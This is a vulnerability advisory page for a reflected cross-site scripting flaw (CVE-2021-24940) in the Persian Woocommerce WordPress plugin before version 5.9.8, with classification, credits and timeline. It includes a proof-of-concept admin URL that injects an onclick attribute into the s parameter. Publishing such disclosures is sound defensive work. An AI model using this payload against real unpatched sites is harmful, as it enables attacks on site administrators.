WordPress Plugin Vulnerabilities

Persian Woocommerce < 5.9.8 - Reflected Cross-Site Scripting

Description

The plugin does not escape the s parameter before outputting it back in an attribute in the admin dashboard, which could lead to a Reflected Cross-Site Scripting issue

Proof of Concept

https://example.com/wp-admin/admin.php?page=persian-wc&s=xxxxx%22+accesskey%3DX+onclick%3Dalert%281%29+test%3D%22

Affects Plugins

Plugin icon
persian-woocommerce
Fixed in 5.9.8

References

CVE
CVE-2021-24940

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
ZhongFu Su(JrXnm) of Wuhan University
Submitter
ZhongFu Su(JrXnm) of Wuhan University
Submitter website
https://blog.szfszf.top
Submitter twitter
JrXnm
Verified
Yes
WPVDB ID
1980c5ca-447d-4875-b542-9212cc7ff77f

Timeline

Publicly Published
2022-02-15 (about 2 years ago)
Added
2022-02-15 (about 2 years ago)
Last Updated
2022-09-26 (about 1 years ago)

Other

Published
Title
Published
2022-12-06
Title
WP Smart Import < 1.0.3 - Reflected Cross-Ste Scripting
Published
2022-11-28
Title
Wholesale Suite < 2.1.5.1 - Subscriber+ Stored Cross-Site Scripting
Published
2022-04-15
Title
KB Support < 1.5.6 - Unauthenticated Stored Cross-Site Scripting
Published
2022-06-13
Title
Ninja Forms < 3.6.10 - Admin+ Stored Cross-Site Scripting
Published
2017-12-19
Title
Custom Map <= 1.1 - Authenticated Cross-Site Scripting (XSS)